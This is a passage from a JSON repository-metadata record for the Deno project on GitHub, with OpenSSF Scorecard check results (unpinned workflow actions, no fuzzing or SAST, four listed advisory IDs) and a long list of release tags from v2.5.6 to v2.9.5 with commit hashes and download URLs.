https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori